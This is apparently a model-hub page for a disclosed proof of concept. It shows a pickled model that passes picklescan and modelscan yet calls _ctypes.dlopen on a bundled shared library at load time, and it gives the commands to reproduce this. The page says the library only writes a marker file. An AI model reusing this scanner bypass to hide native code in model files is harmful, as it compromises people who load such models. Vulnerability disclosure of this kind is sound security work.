Pickle Scanner Bypass via _ctypes.dlopen β€” native RCE (security PoC)

Benign huntr MFV research PoC. A model passes picklescan 1.0.4 and modelscan 0.8.8 as clean, yet on load calls _ctypes.dlopen("./evil.so", 2) β†’ runs the library's constructor = native code execution. _ctypes is the C-backing of the blocked ctypes module (GHSA-4675) and is itself unblocked β€” an incomplete-patch bypass.

Files: model.pkl, model.pt, evil.so (benign; writes /tmp/huntr_poc_ctypes_dlopen), evil.c (source).

pip install picklescan modelscan torch
python -c "from picklescan.scanner import scan_file_path as s; print(s('model.pkl').infected_files)"  # 0
modelscan -p model.pkl   # No issues found!
rm -f /tmp/huntr_poc_ctypes_dlopen
python -c "import pickle; pickle.load(open('model.pkl','rb'))"   # run in the dir holding ./evil.so
cat /tmp/huntr_poc_ctypes_dlopen

Reported by hacnho. The .so only writes a benign marker.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support